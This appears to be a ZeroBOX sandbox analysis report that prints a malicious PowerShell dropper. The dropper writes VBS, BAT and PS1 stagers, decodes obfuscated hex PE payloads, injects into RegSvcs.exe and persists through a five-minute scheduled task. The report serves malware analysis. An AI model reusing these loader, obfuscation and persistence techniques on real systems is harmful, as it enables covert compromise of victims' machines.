popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
Function clay
$p = 'C:\ProgramData\'
$Content = @'
on error resume next
Set clay = CreateObject(Replace("W!S!c!r!i!p!t!.!S!h!e!l!l","!",""))
clay.Run chr(34) & "C:\ProgramData\wa.bat" & Chr(34), 0
Set-Content -Path C:\ProgramData\run.vbs -Value $Content
Start-Sleep -s 5
$Content = @'
PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\updata.ps1
Set-Content -Path C:\ProgramData\wa.bat -Value $Content
Start-Sleep -s 5
$Content = @'
$trobs = "4D-_+5A-_+90-_+00-_+03-_+00-_+00-_+00-_+04-_+00-_+00-_+00-_+FF-_+FF-_+00-_+00-_+B8-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+40-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+80-_+00-_+00-_+00-_+0E-_+1F-_+BA-_+0E-_+00-_+B4-_+09-_+CD-_+21-_+B8-_+01-_+4C-_+CD-_+21-_+54-_+68-_+69-_+73-_+20-_+70-_+72-_+6F-_+67-_+72-_+61-_+6D-_+20-_+63-_+61-_+6E-_+6E-_+6F-_+74-_+20-_+62-_+65-_+20-_+72-_+75-_+6E-_+20-_+69-_+6E-_+20-_+44-_+4F-_+53-_+20-_+6D-_+6F-_+64-_+65-_+2E-_+0D-_+0D-_+0A-_+24-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+50-_+45-_+00-_+00-_+4C-_+01-_+03-_+00-_+23-_+90-_+B7-_+5E-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+E0-_+00-_+02-_+01-_+0B-_+01-_+08-_+00-_+00-_+A8-_+00-_+00-_+00-_+0A-_+00-_+00-_+00-_+00-_+00-_+00-_+4E-_+C7-_+00-_+00-_+00-_+20-_+00-_+00-_+00-_+E0-_+00-_+00-_+00-_+00-_+40-_+00-_+00-_+20-_+00-_+00-_+00-_+02-_+00-_+00-_+04-_+00-_+00-_+00-_+00-_+00-_+00-_+00-_+04-_+00-_+00-_
$wyzzwy = "4D/=5A/=90/=00/=03/=00/=00/=00/=04/=00/=00/=00/=FF/=FF/=00/=00/=B8/=00/=00/=00/=00/=00/=00/=00/=40/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=00/=80/=00/=00/=00/=0E/=1F/=BA/=0E/=00/=B4/=09/=CD/=21/=B8/=01/=4C/=CD/=21/=54/=68/=69/=73/=20/=70/=72/=6F/=67/=72/=61/=6D/=20/=63/=61/=6E/=6E/=6F/=74/=20/=62/=65/=20/=72/=75/=6E/=20/=69/=6E/=20/=44/=4F/=53/=20/=6D/=6F/=64/=65/=2E/=0D/=0D/=0A/=24/=00/=00/=00/=00/=00/=00/=00/=50/=45/=00/=00/=4C/=01/=03/=00/=28/=F3/=56/=8C/=00/=00/=00/=00/=00/=00/=00/=00/=E0/=00/=0E/=21/=0B/=01/=30/=00/=00/=DC/=02/=00/=00/=06/=00/=00/=00/=00/=00/=00/=2E/=FB/=02/=00/=00/=20/=00/=00/=00/=00/=03/=00/=00/=00/=40/=00/=00/=20/=00/=00/=00/=02/=00/=00/=04/=00/=00/=00/=00/=00/=00/=00/=06/=00/=00/=00/=00/=00/=00/=00/=00/=40/=03/=00/=00/=02/=00/=00/=00/=00/=00/=00/=03/=00/=60/=85/=00/=00/=10/=00/=00/=10/=00/=00/=00/=00/=10/=00/=00/=10/=00/=00/=00/=00/=00/=00/=10/=00/=00/=00/=00/=00/=00/=00/=00/=0
Sleep 5
[Byte[]] $bbb = $trobs -split '-_+' | ForEach-Object { [byte]([convert]::ToInt32($_, 16)) }
[Byte[]] $pe = $wyzzwy -split '/=' | ForEach-Object { [byte]([convert]::ToInt32($_, 16)) }
$YIX = [Reflection.Assembly]::Load($pe)
$gss = $YIX.GetType('NewPE.PE' -replace '', '')
$IRW = $gss.GetMethod('Execute')
$KEZ = 'C:\Windows\Micr' -replace '', ''
$ODW = $KEZ + 'osELLLIOOOTTToft.NEELLLIOOOTTTT\FraELLLIOOOTTTmeworELLLIOOOTTTk\v4.0.3ELLLIOOOTTT031ELLLIOOOTTT9\ReELLLIOOOTTTgELLLIOOOTTTSELLLIOOOTTTvELLLIOOOTTTcs.exe' -replace 'ELLLIOOOTTT', ''
$WYZU = @(
$ODW,
$bbb
$IUWS = $IRW.Invoke(
$null,
[object[]] $WYZU
Set-Content -Path C:\ProgramData\updata.ps1 -Value $Content
Start-Sleep -s 35
Invoke-Item "C:\ProgramData\run.vbs"
$Content = @'
&'schtasks.exe' '/create' '/sc' 'minute' '/mo' 5 '/tn' 'updatarunom' '/tr' (('C:\ProgramData\run.vbs'));
Set-Content -Path C:\ProgramData\inst.ps1 -Value $Content
Start-Sleep -s 15
powershell -windo 1 -noexit -exec bypass -file "C:\ProgramData\inst.ps1"
Start-Sleep -s 30
Start-Sleep -S 5
No antivirus signatures available.
No IRMA results available.